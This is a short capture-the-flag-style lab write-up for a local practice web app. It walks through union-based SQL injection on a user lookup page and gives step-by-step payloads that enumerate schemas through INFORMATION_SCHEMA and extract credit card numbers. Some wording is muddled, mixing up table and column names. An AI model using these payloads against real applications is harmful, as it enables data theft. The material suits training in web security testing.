Pivoting with SQL injection

Lab 10: SQL Injection - Pivoting with SQL injection

Go to User Lookup page http://127.0.0.1/index.php?page=user-info.php

We just know that there're 10 columns, than we can utilize UNION operator to do a Union-Based SQLi, and try multiple possible colum names regarding credit card such as: creditcard, credit_card, etc..

Payload -> ' UNION SELECT 1,2,3,4,5,6,7,8,9,1 FROM <column_name> --

for 'creditcard' column name we've an error, then it's not the correct answer.

The right column name is: 'credit_card': ' UNION SELECT 1,2,3,4,5,6,7,8,9,10 FROM credit_cards --

Great, we can retrieve info about db type, and version (answer of lab 11) utilizing this query:

' UNION SELECT 1, database(),version(),user(),5,6,7,8,9,10--

and discover all installed DBs using the following query:

' UNION SELECT 1,schema_name,3,4,5,6,7,8,9,10 from INFORMATION_SCHEMA.SCHEMATA--

Great, at this time we need to understand which db and table have credit_cards as column:

' UNION SELECT 1,COLUMN_NAME,TABLE_NAME,4,5,6,7,8,9,10 TABLE_SCHEMA FROM <db_name>.COLUMNS WHERE table_name='credit_cards'--

In this case the first one value 'information_schema' is the db_name:

' UNION SELECT 1,COLUMN_NAME,TABLE_NAME,4,5,6,7,8,9,10 TABLE_SCHEMA FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='credit_cards'--

The results provide us more info about columns, in this case we need to know only the ccnumber:

' UNION SELECT 1,ccid,ccnumber,4,5,6,7,8,9,10 FROM credit_cards--

and obtain the ccnumber (the last of photo) regarding our response!